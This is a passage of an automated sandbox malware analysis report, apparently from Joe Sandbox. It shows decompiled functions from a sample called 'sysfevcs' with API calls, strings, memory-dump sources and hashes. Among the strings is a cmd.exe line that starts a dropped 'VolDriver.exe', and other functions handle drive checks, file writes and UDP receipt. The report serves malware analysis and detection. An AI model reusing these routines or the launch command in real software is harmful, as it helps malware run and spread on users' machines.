                                                                                                                                                                                                                                                                  					return  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t37;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x00404aab
                                                                                                                                                                                                                                                                  0x00404ab1
                                                                                                                                                                                                                                                                  0x00404ac3
                                                                                                                                                                                                                                                                  0x00404ac9
                                                                                                                                                                                                                                                                  0x00404ad0
                                                                                                                                                                                                                                                                  0x00404af6
                                                                                                                                                                                                                                                                  0x00404b10
                                                                                                                                                                                                                                                                  0x00404b1d
                                                                                                                                                                                                                                                                  0x00404b23
                                                                                                                                                                                                                                                                  0x00404b26
                                                                                                                                                                                                                                                                  0x00404b36
                                                                                                                                                                                                                                                                  0x00404b4b
                                                                                                                                                                                                                                                                  0x00404b63
                                                                                                                                                                                                                                                                  0x00404b6a
                                                                                                                                                                                                                                                                  0x00404b84
                                                                                                                                                                                                                                                                  0x00404b92
                                                                                                                                                                                                                                                                  0x00404b92
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404ba0
                                                                                                                                                                                                                                                                  0x00404ba5

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00404AAB
                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0040F338,00000000,00000001,0040F328,?), ref: 00404AC3
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404AF6
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • %windir%\System32\cmd.exe, xrefs: 00404AFF
                                                                                                                                                                                                                                                                  • /c start .\%s & start .\%s\VolDriver.exe, xrefs: 00404AEA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateInitializeInstancewsprintf
                                                                                                                                                                                                                                                                  • String ID: %windir%\System32\cmd.exe$/c start .\%s & start .\%s\VolDriver.exe
                                                                                                                                                                                                                                                                  • API String ID: 2038452267-2473591295
                                                                                                                                                                                                                                                                  • Opcode ID: e84bca01633c0b67cdaf158f2d842b41c9f03d7c282f571858ef33f9b8c4cd5f
                                                                                                                                                                                                                                                                  • Instruction ID: a0a101224a9dd2f89691b4f744d4c3830e9e87c60b690d54722ae6d8de60f7c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e84bca01633c0b67cdaf158f2d842b41c9f03d7c282f571858ef33f9b8c4cd5f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A31EC75A40208EFCB04DF98C884FDEB7B5EF8C704F2081A9E605A73A1D674AE85CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409380(void* __eax) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				void* _t38;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if( *0x4139e4 == 0) {
                                                                                                                                                                                                                                                                  					return __eax;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_v12 =  *0x4139e4 << 3;
                                                                                                                                                                                                                                                                  				_t38 = E00408840(_v12);
                                                                                                                                                                                                                                                                  				_v8 = _t38;
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					_v20 = 0;
                                                                                                                                                                                                                                                                  					while(_v20 <  *0x4139e4) {
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v20 * 4)) + 4));
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v20 * 4)) + 8));
                                                                                                                                                                                                                                                                  						_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_v16 = CreateFileW(0x4137a0, 0x40000000, 0, 0, 2, 2, 0);
                                                                                                                                                                                                                                                                  					if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						WriteFile(_v16, _v8, _v12,  &_v24, 0);
                                                                                                                                                                                                                                                                  						FlushFileBuffers(_v16);
                                                                                                                                                                                                                                                                  						CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InterlockedExchange(0x4123b4, 0x3d);
                                                                                                                                                                                                                                                                  					return E00408990(_v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t38;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x0040938d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040939c
                                                                                                                                                                                                                                                                  0x004093a3
                                                                                                                                                                                                                                                                  0x004093ab
                                                                                                                                                                                                                                                                  0x004093b2
                                                                                                                                                                                                                                                                  0x004093b8
                                                                                                                                                                                                                                                                  0x004093ca
                                                                                                                                                                                                                                                                  0x004093e8
                                                                                                                                                                                                                                                                  0x004093fe
                                                                                                                                                                                                                                                                  0x004093c7
                                                                                                                                                                                                                                                                  0x004093c7
                                                                                                                                                                                                                                                                  0x0040941e
                                                                                                                                                                                                                                                                  0x00409425
                                                                                                                                                                                                                                                                  0x00409439
                                                                                                                                                                                                                                                                  0x00409443
                                                                                                                                                                                                                                                                  0x0040944d
                                                                                                                                                                                                                                                                  0x0040944d
                                                                                                                                                                                                                                                                  0x0040945a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409469
                                                                                                                                                                                                                                                                  0x0040946f

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(004137A0,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409418
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 00409439
                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409443
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040944D
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(004123B4,0000003D), ref: 0040945A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 442028454-0
                                                                                                                                                                                                                                                                  • Opcode ID: b8ed7ca3bb06fc53ea3f5fb4403c24c03d2bc84ae1038eb0142838dadfe08794
                                                                                                                                                                                                                                                                  • Instruction ID: 450f0bf4d3de1bd92049d4cdc0ad236695143bdb7d06a53e7e3c0e4889a3cbca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8ed7ca3bb06fc53ea3f5fb4403c24c03d2bc84ae1038eb0142838dadfe08794
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C317FB4A00208EBCB10DF94D985BAEB770BB48701F108579E511B73D2C774AE05CF59
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                                                                                                                                  			E00407290(signed int __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				L0040EB1E();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				_v12 = _a4 | _a8 | _a12 | _a16 | _a20 | _a24;
                                                                                                                                                                                                                                                                  				_v8 = __edx | __edx | __edx | __edx | __edx | __edx;
                                                                                                                                                                                                                                                                  				return _v12;
                                                                                                                                                                                                                                                                  			}





                                                                                                                                                                                                                                                                  0x0040729b
                                                                                                                                                                                                                                                                  0x0040729e
                                                                                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                                                                                  0x004072bc
                                                                                                                                                                                                                                                                  0x004072c8
                                                                                                                                                                                                                                                                  0x004072cb
                                                                                                                                                                                                                                                                  0x004072d7
                                                                                                                                                                                                                                                                  0x004072da
                                                                                                                                                                                                                                                                  0x004072e6
                                                                                                                                                                                                                                                                  0x004072eb
                                                                                                                                                                                                                                                                  0x004072ee
                                                                                                                                                                                                                                                                  0x004072fc

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _allshl
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 435966717-0
                                                                                                                                                                                                                                                                  • Opcode ID: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                  • Instruction ID: 9f754f3137e0fb20398a7b2bfdd3e3c1f04f25ec4d5826fc008780c671618def
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3F03172A01428AB9710EEEF84424CAF7F69FC8364B128576FC18E3264E971ED1146F2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040DA20(intOrPtr* __ebx, void* __edi) {
                                                                                                                                                                                                                                                                  				void* _t8;
                                                                                                                                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                                                                                                                                  				void* _t28;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t18 = __ebx;
                                                                                                                                                                                                                                                                  				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                                                                                                                                                                                                  					SetEvent( *(__ebx + 0x10));
                                                                                                                                                                                                                                                                  					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                                                                                                                                                                                                  					CloseHandle( *(__ebx + 0x14));
                                                                                                                                                                                                                                                                  					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                                                                                                                                                                                                  					if(_t26 == 0) {
                                                                                                                                                                                                                                                                  						L6:
                                                                                                                                                                                                                                                                  						E00409320( *((intOrPtr*)(_t18 + 8)));
                                                                                                                                                                                                                                                                  						return E00408990(_t18);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						E00408990( *((intOrPtr*)(_t26 + 0x18)));
                                                                                                                                                                                                                                                                  						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                                                                                                                                                                                                  						E00408990(_t26);
                                                                                                                                                                                                                                                                  						_t28 = _t28 + 8;
                                                                                                                                                                                                                                                                  						_t26 = _t23;
                                                                                                                                                                                                                                                                  					} while (_t23 != 0);
                                                                                                                                                                                                                                                                  					goto L6;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t8;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x0040da20
                                                                                                                                                                                                                                                                  0x0040da22
                                                                                                                                                                                                                                                                  0x0040da31
                                                                                                                                                                                                                                                                  0x0040da3d
                                                                                                                                                                                                                                                                  0x0040da47
                                                                                                                                                                                                                                                                  0x0040da4d
                                                                                                                                                                                                                                                                  0x0040da52
                                                                                                                                                                                                                                                                  0x0040da71
                                                                                                                                                                                                                                                                  0x0040da75
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040da83
                                                                                                                                                                                                                                                                  0x0040da55
                                                                                                                                                                                                                                                                  0x0040da59
                                                                                                                                                                                                                                                                  0x0040da5e
                                                                                                                                                                                                                                                                  0x0040da62
                                                                                                                                                                                                                                                                  0x0040da67
                                                                                                                                                                                                                                                                  0x0040da6a
                                                                                                                                                                                                                                                                  0x0040da6c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040da70
                                                                                                                                                                                                                                                                  0x0040da84

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA31
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA3D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA47
                                                                                                                                                                                                                                                                    • Part of subcall function 00408990: HeapFree.KERNEL32(00000000,00000000,00401192,?,00401192,?), ref: 004089EB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                                  • String ID: pdu
                                                                                                                                                                                                                                                                  • API String ID: 309973729-2320407122
                                                                                                                                                                                                                                                                  • Opcode ID: a4159a7b1ea9fa661d84915d37acaaaa2ad2be22c10f7c298b8a075976db8b92
                                                                                                                                                                                                                                                                  • Instruction ID: 681866068359fbce6a25617bf8070456bf8c17b75bf7d52c20a0952ba5eed7f9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4159a7b1ea9fa661d84915d37acaaaa2ad2be22c10f7c298b8a075976db8b92
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8F0C8B69002109BCB24AFA5EC84C1B77B89F48320304467EFD547B386CA38EC09CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404900(WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				short _v1052;
                                                                                                                                                                                                                                                                  				intOrPtr _v1056;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetDriveTypeW(_a4);
                                                                                                                                                                                                                                                                  				_v1056 = _v8;
                                                                                                                                                                                                                                                                  				if(_v1056 >= 2) {
                                                                                                                                                                                                                                                                  					if(_v1056 <= 3 || _v1056 == 6) {
                                                                                                                                                                                                                                                                  						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                                                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x00404913
                                                                                                                                                                                                                                                                  0x00404919
                                                                                                                                                                                                                                                                  0x00404926
                                                                                                                                                                                                                                                                  0x0040492f
                                                                                                                                                                                                                                                                  0x00404954
                                                                                                                                                                                                                                                                  0x0040496e
                                                                                                                                                                                                                                                                  0x0040496e
                                                                                                                                                                                                                                                                  0x00404954
                                                                                                                                                                                                                                                                  0x0040492f
                                                                                                                                                                                                                                                                  0x0040497b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(004049BF), ref: 0040490D
                                                                                                                                                                                                                                                                  • QueryDosDeviceW.KERNEL32(004049BF,?,00000208), ref: 0040494C
                                                                                                                                                                                                                                                                  • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404964
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                                  • String ID: \??\
                                                                                                                                                                                                                                                                  • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                                  • Opcode ID: 942f71382a869f2c97a40c4b9f3276f149eb08a5c33dbbf2d140b6582a894b9a
                                                                                                                                                                                                                                                                  • Instruction ID: 0e74c5151ddb8513688fdff2756bd8c47834fad0a87df30cb323bbc8f0aad129
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 942f71382a869f2c97a40c4b9f3276f149eb08a5c33dbbf2d140b6582a894b9a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4001E1F094120CEBCB60CF65CD49ADA77B4AB45705F0081BAA604B7690D7749E85CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                                                                                                                  			E0040D7F0(char* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				char _v32;
                                                                                                                                                                                                                                                                  				char _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                                                                                                                  				char _v56;
                                                                                                                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                                                                                                                  				char* _t23;
                                                                                                                                                                                                                                                                  				short _t26;
                                                                                                                                                                                                                                                                  				long _t29;
                                                                                                                                                                                                                                                                  				short _t34;
                                                                                                                                                                                                                                                                  				intOrPtr _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                                                                                                                  				long _t47;
                                                                                                                                                                                                                                                                  				signed int _t48;
                                                                                                                                                                                                                                                                  				void* _t50;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t40 = __edx;
                                                                                                                                                                                                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                                                                                                                                                                                                  				_t34 = 0;
                                                                                                                                                                                                                                                                  				_t43 = _a4;
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_t23 =  &_v32;
                                                                                                                                                                                                                                                                  					_v32 = 0;
                                                                                                                                                                                                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23);
                                                                                                                                                                                                                                                                  					if(_t23 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t37 = _v44;
                                                                                                                                                                                                                                                                  					if(_t37 != 0) {
                                                                                                                                                                                                                                                                  						if(_t34 == 0 || _v40 < _t37) {
                                                                                                                                                                                                                                                                  							_v40 = _t37;
                                                                                                                                                                                                                                                                  							_t26 = E00408880(_t37, _t40, _t34, _t37);
                                                                                                                                                                                                                                                                  							_t37 = _v44;
                                                                                                                                                                                                                                                                  							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                                  							_t34 = _t26;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v26 = 0;
                                                                                                                                                                                                                                                                  						_v22 = 0;
                                                                                                                                                                                                                                                                  						_v18 = 0;
                                                                                                                                                                                                                                                                  						_t29 =  *(_t43 + 8);
                                                                                                                                                                                                                                                                  						_v32 = 0;
                                                                                                                                                                                                                                                                  						_t40 =  &_v32;
                                                                                                                                                                                                                                                                  						_v36 = 0x10;
                                                                                                                                                                                                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                                                                                                                                                                                                  						_t47 = _t29;
                                                                                                                                                                                                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                                                                                                                                                                                                  							_t40 =  &_v56;
                                                                                                                                                                                                                                                                  							E0040D6C0(_t43, _t34, _t47, _v68,  &_v56);
                                                                                                                                                                                                                                                                  							_t50 = _t50 + 0x14;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                                                                                                                                                                                                  				return E00408990(_t34);
                                                                                                                                                                                                                                                                  			}























                                                                                                                                                                                                                                                                  0x0040d7f0
                                                                                                                                                                                                                                                                  0x0040d7f6
                                                                                                                                                                                                                                                                  0x0040d7fb
                                                                                                                                                                                                                                                                  0x0040d7fe
                                                                                                                                                                                                                                                                  0x0040d801
                                                                                                                                                                                                                                                                  0x0040d805
                                                                                                                                                                                                                                                                  0x0040d808
                                                                                                                                                                                                                                                                  0x0040d813
                                                                                                                                                                                                                                                                  0x0040d81b
                                                                                                                                                                                                                                                                  0x0040d824
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d82a
                                                                                                                                                                                                                                                                  0x0040d830
                                                                                                                                                                                                                                                                  0x0040d838
                                                                                                                                                                                                                                                                  0x0040d842
                                                                                                                                                                                                                                                                  0x0040d846
                                                                                                                                                                                                                                                                  0x0040d84b
                                                                                                                                                                                                                                                                  0x0040d84f
                                                                                                                                                                                                                                                                  0x0040d852
                                                                                                                                                                                                                                                                  0x0040d852
                                                                                                                                                                                                                                                                  0x0040d858
                                                                                                                                                                                                                                                                  0x0040d85c
                                                                                                                                                                                                                                                                  0x0040d860
                                                                                                                                                                                                                                                                  0x0040d864
                                                                                                                                                                                                                                                                  0x0040d86e
                                                                                                                                                                                                                                                                  0x0040d871
                                                                                                                                                                                                                                                                  0x0040d876
                                                                                                                                                                                                                                                                  0x0040d880
                                                                                                                                                                                                                                                                  0x0040d888
                                                                                                                                                                                                                                                                  0x0040d88e
                                                                                                                                                                                                                                                                  0x0040d893
                                                                                                                                                                                                                                                                  0x0040d89e
                                                                                                                                                                                                                                                                  0x0040d8a8
                                                                                                                                                                                                                                                                  0x0040d8b1
                                                                                                                                                                                                                                                                  0x0040d8b6
                                                                                                                                                                                                                                                                  0x0040d8b6
                                                                                                                                                                                                                                                                  0x0040d893
                                                                                                                                                                                                                                                                  0x0040d8c5
                                                                                                                                                                                                                                                                  0x0040d8df

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32 ref: 0040D81B
                                                                                                                                                                                                                                                                  • recvfrom.WS2_32 ref: 0040D888
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D89E
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040D8BF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.296293403.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296287218.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296308470.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.296320207.0000000000412000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3980219359-0
                                                                                                                                                                                                                                                                  • Opcode ID: 05a2bb9e7a3121bc56c56a086e10ed4f77bf971dac491e08655f5bc05b27729b
                                                                                                                                                                                                                                                                  • Instruction ID: 119aadf5a9a9cd361830cf8028f649034fe7dd0606bb4db59d8f1df16a6ab9b6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05a2bb9e7a3121bc56c56a086e10ed4f77bf971dac491e08655f5bc05b27729b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 672187B2504301AFD314EF65DC8496BB7E9EF84314F008A3DF565E2291E774D94C8BAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 29%
